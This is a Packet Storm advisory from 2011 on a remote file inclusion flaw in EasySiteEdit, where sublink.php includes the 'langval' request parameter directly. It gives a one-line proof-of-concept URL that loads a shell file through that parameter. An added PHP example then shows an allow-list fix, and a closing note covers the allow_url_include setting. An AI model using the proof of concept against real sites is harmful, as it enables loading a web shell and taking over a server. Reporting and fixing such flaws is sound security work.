EasySiteEdit Remote File Inclusion

2011-08-22T00:00:00
ID PACKETSTORM:104292
Type packetstorm
Reporter koskesh jakesh
Modified 2011-08-22T00:00:00

Description

                                        
```
# Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat
```
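
A hardened form of the `include($_REQUEST['langval']);` call reported above, shown as an added example; it is not EasySiteEdit's code or a vendor patch. The `lang/` directory, the language codes and the names `resolve_lang_file`, `LANG_DIR`, `LANG_ALLOWED` and `LANG_DEFAULT` are assumptions made for illustration.

```php
<?php
// Added example: allow-list replacement for include($_REQUEST['langval']).
// Assumptions (not from EasySiteEdit): language files live in ./lang/ and are
// named <code>.php; the codes listed below are placeholders.
declare(strict_types=1);

const LANG_DIR     = __DIR__ . '/lang';
const LANG_ALLOWED = ['en', 'de', 'fr'];   // hypothetical list of shipped languages
const LANG_DEFAULT = 'en';

/**
 * Map an untrusted request value to a file path inside LANG_DIR.
 * Anything that is not exactly one of the allow-listed codes falls back
 * to the default language instead of being passed to include.
 */
function resolve_lang_file($value): string
{
    // Arrays (langval[]=x) and other non-string input are rejected outright.
    if (!is_string($value) || !in_array($value, LANG_ALLOWED, true)) {
        $value = LANG_DEFAULT;
    }
    // The path is a constant directory plus an allow-listed token, so no URL
    // scheme, "../" sequence or null byte from the request can reach include.
    return LANG_DIR . '/' . $value . '.php';
}

// Read from $_GET only: $_REQUEST also merges POST data and, depending on
// request_order, cookies, which widens the input surface for no benefit.
$file = resolve_lang_file($_GET['langval'] ?? LANG_DEFAULT);

if (is_file($file)) {
    include $file;
} else {
    // A missing file is a deployment error, not something to resolve from input.
    http_response_code(500);
    error_log('language file missing: ' . $file);
}
```

Independently of the code change, `allow_url_include = Off` in `php.ini` (the default since PHP 5.2) stops `include` from fetching remote URLs. It does not restrict local paths, so the allow-list is still needed.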